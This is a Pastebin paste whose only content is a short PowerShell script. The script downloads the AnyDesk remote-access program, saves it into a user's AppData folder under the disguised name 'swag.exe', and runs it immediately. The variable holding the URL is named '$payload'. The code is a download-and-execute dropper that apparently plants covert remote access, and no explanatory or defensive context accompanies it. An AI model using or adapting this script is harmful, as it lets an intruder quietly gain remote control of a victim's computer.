Advertisement
akaMeltDown

Untitled

Sep 13th, 2022
28
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.21 KB | None | 0 0
  1. $downloader = New-Object System.Net.WebClient
  2. $payload = "http://download.anydesk.com/AnyDesk.exe"
  3. $local_file = "C:\Users\Josh\AppData\Roaming\swag.exe"
  4. $downloader.DownloadFile($payload, $local_file)
  5. & $local_file
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement